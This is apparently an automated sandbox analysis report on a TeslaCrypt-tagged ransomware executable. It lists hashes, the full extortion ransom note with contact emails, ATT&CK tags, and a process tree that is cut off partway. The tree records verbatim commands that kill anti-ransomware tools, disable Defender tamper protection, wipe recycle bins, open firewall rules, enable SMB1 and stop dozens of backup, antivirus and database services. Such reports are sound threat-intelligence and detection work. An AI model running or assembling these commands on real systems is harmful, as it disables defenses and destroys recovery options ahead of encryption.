teslacrypt | dcd725c415cebc7df170edf49af18d6f86e76ef75185737de5959405f4aecc56

Analysis

max time kernel
93s
max time network
129s
platform
windows10_x64
resource
win10v20201028
submitted
22-01-2021 08:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

wqm58yk7.exe
Size

104KB
MD5

48ea3794091a9f17e12f5c1a90e1f7d7
SHA1

1bb17eef59764e84f95b7a5c0aad649b8517ee43
SHA256

dcd725c415cebc7df170edf49af18d6f86e76ef75185737de5959405f4aecc56
SHA512

0355be6a2b2cf58d4ca5b11de5f84803240587937cd28d064df20ac38c945352e14c78e21006824114f67ede71be3ab27cc27b05759fc23a1fb8dcfa31a7244f

Score

10^/10

teslacrypt discovery evasion ransomware trojan

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt

Ransom Note

Don't worry, you can return all your files! All your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. We also downloaded your corporate files (databases, tables, accounting information, etc.) and we will have to publish them if you do not agree to cooperation. To get this software you need write on our e-mail: workplus111@protonmail.com Reserve e-mail address to contact us: worker400@airmail.cc Key Identifier: fvVTTLr4/T3xT5dbQe0ltZHrHIDbGkllnoGveYkIL0bnmpUKaJf2ZPd1wmwNvgXQr8X0arr+OkTzzP8xYiEmtzfr7IeM9OIppwgVZTpACSzAIUHXXfx8WQPPtQI9mOisUmlngi6oX3m4HyWIqqUuWn40SynvwV65avcF6i8aU8/I8EvyUoHi8M7ZDbHGIsdbIkufNWm1eDFpr/1RiprcAvlAYjobucHwKAaXty+M53om7m7q/LYmzu5Fl+mLntTgzpsUi87ypqoSYc2MDM4Jld6p83BaLsJjT/N7gHmdn3QlFTEI7R1zIsGoO3GSjcUlEHWoa43XyEQm3iz6YCf5V9kikufDPtZ0bJ8bD6KBfD91phLVbb9jPyYOQWVEtKNGRMYqzOQDH4oIfeau92F33mePKFIdxE+sl29PCVjMIks7lwW3I7gGiWJYEVIcCQl4uolO7FGd1+YBg81jAlqAxSs/XL3BeydMfsYEoMIHl2GruDKOugTavyShU510moCoecXNc191+cZcbE9K8NbH8J1s6z83btNiLaqeVZ7qsMFXEt10CmbuKuD0SwsGpdZb7p8zE3Ul0e1VR4guJCTsnvfR4W4iG/8iiiqBvrHudqhT5BSZURVgsuWJ5VsosWe9qbdV3ePrVhF4EFh9+B+3AFPiGxM+cKvW0LkFYSDjEWk=

Emails

workplus111@protonmail.com

worker400@airmail.cc

Extracted

Path

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt

Ransom Note

Emails

workplus111@protonmail.com

worker400@airmail.cc

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
TeslaCrypt, AlphaCrypt
Ransomware based on CryptoLocker. Shut down by the developers in 2016.
ransomware teslacrypt
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Drops startup file 1 IoCs

Processes:

wqm58yk7.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk wqm58yk7.exe
Modifies file permissions 1 TTPs 3 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exe

pid process

13012 icacls.exe
13028 icacls.exe
13020 icacls.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	wqm58yk7.exe

pid	process
13012	icacls.exe
13028	icacls.exe
13020	icacls.exe

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

wqm58yk7.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	wqm58yk7.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	wqm58yk7.exe

Drops file in Windows directory 1 IoCs

Processes:

powershell.exe

description ioc process

File opened for modification C:\Windows\Logs\DISM\dism.log powershell.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Discovers systems in the same network 1 TTPs 1 IoCs
discovery

Remote System Discovery
T1018

Processes:

net.exe

pid process

8968 net.exe

description	ioc	process
File opened for modification	C:\Windows\Logs\DISM\dism.log	powershell.exe

pid	process
8968	net.exe

Kills process with taskkill 48 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
10932	taskkill.exe
11188	taskkill.exe
11140	taskkill.exe
11124	taskkill.exe
11092	taskkill.exe
11076	taskkill.exe
11028	taskkill.exe
10964	taskkill.exe
12992	taskkill.exe
7292	taskkill.exe
8316	taskkill.exe
11244	taskkill.exe
11252	taskkill.exe
11204	taskkill.exe
11164	taskkill.exe
11132	taskkill.exe
10972	taskkill.exe
11172	taskkill.exe
11068	taskkill.exe
11012	taskkill.exe
10988	taskkill.exe
9316	taskkill.exe
11236	taskkill.exe
11180	taskkill.exe
11148	taskkill.exe
11044	taskkill.exe
10956	taskkill.exe
11004	taskkill.exe
8176	taskkill.exe
11228	taskkill.exe
11220	taskkill.exe
11212	taskkill.exe
11196	taskkill.exe
11060	taskkill.exe
11052	taskkill.exe
10980	taskkill.exe
10940	taskkill.exe
10948	taskkill.exe
11260	taskkill.exe
11116	taskkill.exe
11108	taskkill.exe
11100	taskkill.exe
11084	taskkill.exe
11036	taskkill.exe
10996	taskkill.exe
4572	taskkill.exe
11156	taskkill.exe
11020	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

604 reg.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

notepad.exe

pid process

16204 notepad.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

5844 PING.EXE

pid	process
604	reg.exe

pid	process
16204	notepad.exe

pid	process
5844	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

wqm58yk7.exe

pid	process
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe
4776	wqm58yk7.exe

Suspicious use of AdjustPrivilegeToken 51 IoCs

Processes:

wqm58yk7.exepowershell.exetaskkill.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4776	wqm58yk7.exe
Token: SeDebugPrivilege	3280	powershell.exe
Token: SeDebugPrivilege	4572	taskkill.exe
Token: SeDebugPrivilege	1288	powershell.exe
Token: SeDebugPrivilege	10940	taskkill.exe
Token: SeDebugPrivilege	11156	taskkill.exe
Token: SeDebugPrivilege	11140	taskkill.exe
Token: SeDebugPrivilege	11164	taskkill.exe
Token: SeDebugPrivilege	11148	taskkill.exe
Token: SeDebugPrivilege	10932	taskkill.exe
Token: SeDebugPrivilege	11204	taskkill.exe
Token: SeDebugPrivilege	10948	taskkill.exe
Token: SeDebugPrivilege	11172	taskkill.exe
Token: SeDebugPrivilege	10972	taskkill.exe
Token: SeDebugPrivilege	10964	taskkill.exe
Token: SeDebugPrivilege	10988	taskkill.exe
Token: SeDebugPrivilege	10956	taskkill.exe
Token: SeDebugPrivilege	11020	taskkill.exe
Token: SeDebugPrivilege	10980	taskkill.exe
Token: SeDebugPrivilege	11068	taskkill.exe
Token: SeDebugPrivilege	11028	taskkill.exe
Token: SeDebugPrivilege	11100	taskkill.exe
Token: SeDebugPrivilege	11084	taskkill.exe
Token: SeDebugPrivilege	11108	taskkill.exe
Token: SeDebugPrivilege	11060	taskkill.exe
Token: SeDebugPrivilege	11052	taskkill.exe
Token: SeDebugPrivilege	11036	taskkill.exe
Token: SeDebugPrivilege	11044	taskkill.exe
Token: SeDebugPrivilege	11004	taskkill.exe
Token: SeDebugPrivilege	11012	taskkill.exe
Token: SeDebugPrivilege	11180	taskkill.exe
Token: SeDebugPrivilege	11132	taskkill.exe
Token: SeDebugPrivilege	11212	taskkill.exe
Token: SeDebugPrivilege	9316	taskkill.exe
Token: SeDebugPrivilege	11196	taskkill.exe
Token: SeDebugPrivilege	11188	taskkill.exe
Token: SeDebugPrivilege	8176	taskkill.exe
Token: SeDebugPrivilege	8316	taskkill.exe
Token: SeDebugPrivilege	11228	taskkill.exe
Token: SeDebugPrivilege	11236	taskkill.exe
Token: SeDebugPrivilege	7292	taskkill.exe
Token: SeDebugPrivilege	11244	taskkill.exe
Token: SeDebugPrivilege	11252	taskkill.exe
Token: SeDebugPrivilege	11260	taskkill.exe
Token: SeDebugPrivilege	11220	taskkill.exe
Token: SeDebugPrivilege	11124	taskkill.exe
Token: SeDebugPrivilege	10996	taskkill.exe
Token: SeDebugPrivilege	11116	taskkill.exe
Token: SeDebugPrivilege	11076	taskkill.exe
Token: SeDebugPrivilege	12992	taskkill.exe
Token: SeDebugPrivilege	13000	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

wqm58yk7.exe

pid process

4776 wqm58yk7.exe
Suspicious use of SendNotifyMessage 1 IoCs

Processes:

wqm58yk7.exe

pid process

4776 wqm58yk7.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

wqm58yk7.exe

description	pid	process	target process
PID 4776 wrote to memory of 3280	4776	wqm58yk7.exe	powershell.exe
PID 4776 wrote to memory of 3280	4776	wqm58yk7.exe	powershell.exe
PID 4776 wrote to memory of 3280	4776	wqm58yk7.exe	powershell.exe
PID 4776 wrote to memory of 4572	4776	wqm58yk7.exe	taskkill.exe
PID 4776 wrote to memory of 4572	4776	wqm58yk7.exe	taskkill.exe
PID 4776 wrote to memory of 4572	4776	wqm58yk7.exe	taskkill.exe
PID 4776 wrote to memory of 4632	4776	wqm58yk7.exe	reg.exe
PID 4776 wrote to memory of 4632	4776	wqm58yk7.exe	reg.exe
PID 4776 wrote to memory of 4632	4776	wqm58yk7.exe	reg.exe
PID 4776 wrote to memory of 604	4776	wqm58yk7.exe	reg.exe
PID 4776 wrote to memory of 604	4776	wqm58yk7.exe	reg.exe
PID 4776 wrote to memory of 604	4776	wqm58yk7.exe	reg.exe
PID 4776 wrote to memory of 880	4776	wqm58yk7.exe	schtasks.exe
PID 4776 wrote to memory of 880	4776	wqm58yk7.exe	schtasks.exe
PID 4776 wrote to memory of 880	4776	wqm58yk7.exe	schtasks.exe
PID 4776 wrote to memory of 1184	4776	wqm58yk7.exe	sc.exe
PID 4776 wrote to memory of 1184	4776	wqm58yk7.exe	sc.exe
PID 4776 wrote to memory of 1184	4776	wqm58yk7.exe	sc.exe
PID 4776 wrote to memory of 1272	4776	wqm58yk7.exe	sc.exe
PID 4776 wrote to memory of 1272	4776	wqm58yk7.exe	sc.exe
PID 4776 wrote to memory of 1272	4776	wqm58yk7.exe	sc.exe
PID 4776 wrote to memory of 1392	4776	wqm58yk7.exe	sc.exe
PID 4776 wrote to memory of 1392	4776	wqm58yk7.exe	sc.exe
PID 4776 wrote to memory of 1392	4776	wqm58yk7.exe	sc.exe
PID 4776 wrote to memory of 1524	4776	wqm58yk7.exe	sc.exe
PID 4776 wrote to memory of 1524	4776	wqm58yk7.exe	sc.exe
PID 4776 wrote to memory of 1524	4776	wqm58yk7.exe	sc.exe
PID 4776 wrote to memory of 1780	4776	wqm58yk7.exe	sc.exe
PID 4776 wrote to memory of 1780	4776	wqm58yk7.exe	sc.exe
PID 4776 wrote to memory of 1780	4776	wqm58yk7.exe	sc.exe
PID 4776 wrote to memory of 1548	4776	wqm58yk7.exe	sc.exe
PID 4776 wrote to memory of 1548	4776	wqm58yk7.exe	sc.exe
PID 4776 wrote to memory of 1548	4776	wqm58yk7.exe	sc.exe
PID 4776 wrote to memory of 2164	4776	wqm58yk7.exe	sc.exe
PID 4776 wrote to memory of 2164	4776	wqm58yk7.exe	sc.exe
PID 4776 wrote to memory of 2164	4776	wqm58yk7.exe	sc.exe
PID 4776 wrote to memory of 2552	4776	wqm58yk7.exe	sc.exe
PID 4776 wrote to memory of 2552	4776	wqm58yk7.exe	sc.exe
PID 4776 wrote to memory of 2552	4776	wqm58yk7.exe	sc.exe
PID 4776 wrote to memory of 2816	4776	wqm58yk7.exe	cmd.exe
PID 4776 wrote to memory of 2816	4776	wqm58yk7.exe	cmd.exe
PID 4776 wrote to memory of 2816	4776	wqm58yk7.exe	cmd.exe
PID 4776 wrote to memory of 2672	4776	wqm58yk7.exe	cmd.exe
PID 4776 wrote to memory of 2672	4776	wqm58yk7.exe	cmd.exe
PID 4776 wrote to memory of 2672	4776	wqm58yk7.exe	cmd.exe
PID 4776 wrote to memory of 2676	4776	wqm58yk7.exe	netsh.exe
PID 4776 wrote to memory of 2676	4776	wqm58yk7.exe	netsh.exe
PID 4776 wrote to memory of 2676	4776	wqm58yk7.exe	netsh.exe
PID 4776 wrote to memory of 188	4776	wqm58yk7.exe	netsh.exe
PID 4776 wrote to memory of 188	4776	wqm58yk7.exe	netsh.exe
PID 4776 wrote to memory of 188	4776	wqm58yk7.exe	netsh.exe
PID 4776 wrote to memory of 204	4776	wqm58yk7.exe	net.exe
PID 4776 wrote to memory of 204	4776	wqm58yk7.exe	net.exe
PID 4776 wrote to memory of 204	4776	wqm58yk7.exe	net.exe
PID 4776 wrote to memory of 664	4776	wqm58yk7.exe	net.exe
PID 4776 wrote to memory of 664	4776	wqm58yk7.exe	net.exe
PID 4776 wrote to memory of 664	4776	wqm58yk7.exe	net.exe
PID 4776 wrote to memory of 3956	4776	wqm58yk7.exe	net.exe
PID 4776 wrote to memory of 3956	4776	wqm58yk7.exe	net.exe
PID 4776 wrote to memory of 3956	4776	wqm58yk7.exe	net.exe
PID 4776 wrote to memory of 4688	4776	wqm58yk7.exe	net.exe
PID 4776 wrote to memory of 4688	4776	wqm58yk7.exe	net.exe
PID 4776 wrote to memory of 4688	4776	wqm58yk7.exe	net.exe
PID 4776 wrote to memory of 4356	4776	wqm58yk7.exe	net.exe

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

Processes:

wqm58yk7.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	wqm58yk7.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	wqm58yk7.exe

C:\Users\Admin\AppData\Local\Temp\wqm58yk7.exe
"C:\Users\Admin\AppData\Local\Temp\wqm58yk7.exe"
1⤵
- Drops startup file
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4776

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3280

C:\Windows\SysWOW64\taskkill.exe
"taskkill" /F /IM RaccineSettings.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4572

C:\Windows\SysWOW64\reg.exe
"reg" delete HKCU\Software\Raccine /F
2⤵
- Modifies registry key
PID:604

C:\Windows\SysWOW64\reg.exe
"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
2⤵
PID:4632

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /DELETE /TN "Raccine Rules Updater" /F
2⤵
PID:880

C:\Windows\SysWOW64\sc.exe
"sc.exe" config Dnscache start= auto
2⤵
PID:1184

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
2⤵
PID:1272

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
2⤵
PID:1392

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLWriter start= disabled
2⤵
PID:1524

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SstpSvc start= disabled
2⤵
PID:1780

C:\Windows\SysWOW64\sc.exe
"sc.exe" config upnphost start= auto
2⤵
PID:2552

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
2⤵
PID:2816

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c rd /s /q D:\\$Recycle.bin
2⤵
PID:2672

C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
2⤵
PID:188

C:\Windows\SysWOW64\net.exe
"net.exe" start SSDPSRV /y
2⤵
PID:664

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start SSDPSRV /y
3⤵
PID:764

C:\Windows\SysWOW64\net.exe
"net.exe" start upnphost /y
2⤵
PID:3956

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start upnphost /y
3⤵
PID:4428

C:\Windows\SysWOW64\net.exe
"net.exe" stop bedbg /y
2⤵
PID:4356

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop bedbg /y
3⤵
PID:3572

C:\Windows\SysWOW64\net.exe
"net.exe" stop EhttpSrv /y
2⤵
PID:3012

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EhttpSrv /y
3⤵
PID:1260

C:\Windows\SysWOW64\net.exe
"net.exe" stop MMS /y
2⤵
PID:4648

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MMS /y
3⤵
PID:1668

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SQL_2008 /y
2⤵
PID:1376

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
3⤵
PID:4504

C:\Windows\SysWOW64\net.exe
"net.exe" start Dnscache /y
2⤵
PID:4688

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start Dnscache /y
3⤵
PID:4520

C:\Windows\SysWOW64\net.exe
"net.exe" start FDResPub /y
2⤵
PID:204

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start FDResPub /y
3⤵
PID:4304

C:\Windows\SysWOW64\net.exe
"net.exe" stop ekrn /y
2⤵
PID:4048

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ekrn /y
3⤵
PID:60

C:\Windows\SysWOW64\net.exe
"net.exe" stop mozyprobackup /y
2⤵
PID:3656

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mozyprobackup /y
3⤵
PID:2500

C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeDLPAgentService /y
2⤵
PID:2376

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
3⤵
PID:4364

C:\Windows\SysWOW64\net.exe
"net.exe" stop DefWatch /y
2⤵
PID:4580

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DefWatch /y
3⤵
PID:4360

C:\Windows\SysWOW64\net.exe
"net.exe" stop ccSetMgr /y
2⤵
PID:3620

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ccSetMgr /y
3⤵
PID:1816

C:\Windows\SysWOW64\net.exe
"net.exe" stop RTVscan /y
2⤵
PID:3372

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
3⤵
PID:4088

C:\Windows\SysWOW64\net.exe
"net.exe" stop QBIDPService /y
2⤵
PID:64

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBIDPService /y
3⤵
PID:6472

C:\Windows\SysWOW64\net.exe
"net.exe" stop VSNAPVSS /y
2⤵
PID:4404

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
3⤵
PID:7556

C:\Windows\SysWOW64\net.exe
"net.exe" stop Intuit.QuickBooks.FCS /y
2⤵
PID:4084

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
3⤵
PID:11876

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamTransportSvc /y
2⤵
PID:3916

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
3⤵
PID:10288

C:\Windows\SysWOW64\net.exe
"net.exe" stop BMR Boot Service /y
2⤵
PID:4332

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
3⤵
PID:8588

C:\Windows\SysWOW64\net.exe
"net.exe" stop mfewc /y
2⤵
PID:3664

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfewc /y
3⤵
PID:9580

C:\Windows\SysWOW64\net.exe
"net.exe" stop PDVFSService /y
2⤵
PID:2160

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
3⤵
PID:8964

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:1288

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SYSTEM_BGC /y
2⤵
PID:1464

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
3⤵
PID:8640

C:\Windows\SysWOW64\net.exe
"net.exe" stop QBFCService /y
2⤵
PID:3340

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
3⤵
PID:2572

C:\Windows\SysWOW64\net.exe
"net.exe" stop SavRoam /y
2⤵
PID:4616

C:\Windows\SysWOW64\net.exe
"net.exe" stop ccEvtMgr /y
2⤵
PID:3452

C:\Windows\SysWOW64\net.exe
"net.exe" stop NetBackup BMR MTFTP Service /y
2⤵
PID:4440

C:\Windows\SysWOW64\net.exe
"net.exe" stop avpsus /y
2⤵
PID:2368

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SQLEXPRESS /y
2⤵
PID:4124

C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
2⤵
PID:2676

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SSDPSRV start= auto
2⤵
PID:2164

C:\Windows\SysWOW64\sc.exe
"sc.exe" config FDResPub start= auto
2⤵
PID:1548

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecDeviceMediaService /y
2⤵
PID:5708

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
3⤵
PID:14836

C:\Windows\SysWOW64\net.exe
"net.exe" stop EsgShKernel /y
2⤵
PID:7272

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EsgShKernel /y
3⤵
PID:4748

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$TPSAMA /y
2⤵
PID:7256

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
3⤵
PID:14032

C:\Windows\SysWOW64\net.exe
"net.exe" stop ntrtscan /y
2⤵
PID:7248

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ntrtscan /y
3⤵
PID:12900

C:\Windows\SysWOW64\net.exe
"net.exe" stop EPUpdateService /y
2⤵
PID:7240

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EPUpdateService /y
3⤵
PID:14444

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$TPS /y
2⤵
PID:7232

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPS /y
3⤵
PID:11392

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$VEEAMSQL2008R2 /y
2⤵
PID:7224

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
3⤵
PID:12892

C:\Windows\SysWOW64\net.exe
"net.exe" stop EPSecurityService /y
2⤵
PID:7208

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EPSecurityService /y
3⤵
PID:2140

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c net view
2⤵
PID:7200

C:\Windows\SysWOW64\net.exe
net view
3⤵
- Discovers systems in the same network
PID:8968

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$VEEAMSQL2008R2 /y
2⤵
PID:6940

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
3⤵
PID:4320

C:\Windows\SysWOW64\net.exe
"net.exe" stop vapiendpoint /y
2⤵
PID:6800

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop vapiendpoint /y
3⤵
PID:13984

C:\Windows\SysWOW64\net.exe
"net.exe" stop mssql$vim_sqlexp /y
2⤵
PID:6788

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
3⤵
PID:13792

C:\Windows\SysWOW64\net.exe
"net.exe" stop WRSVC /y
2⤵
PID:6780

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop WRSVC /y
3⤵
PID:13768

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLTELEMETRY$ECWDB2 /y
2⤵
PID:6772

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
3⤵
PID:3616

C:\Windows\SysWOW64\net.exe
"net.exe" stop TrueKeyServiceHelper /y
2⤵
PID:6764

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
3⤵
PID:14296

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLTELEMETRY /y
2⤵
PID:6756

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY /y
3⤵
PID:13960

C:\Windows\SysWOW64\net.exe
"net.exe" stop TrueKeyScheduler /y
2⤵
PID:6748

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKeyScheduler /y
3⤵
PID:14192

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLSERVERAGENT /y
2⤵
PID:6732

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLSERVERAGENT /y
3⤵
PID:13800

C:\Windows\SysWOW64\net.exe
"net.exe" stop TrueKey /y
2⤵
PID:6724

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKey /y
3⤵
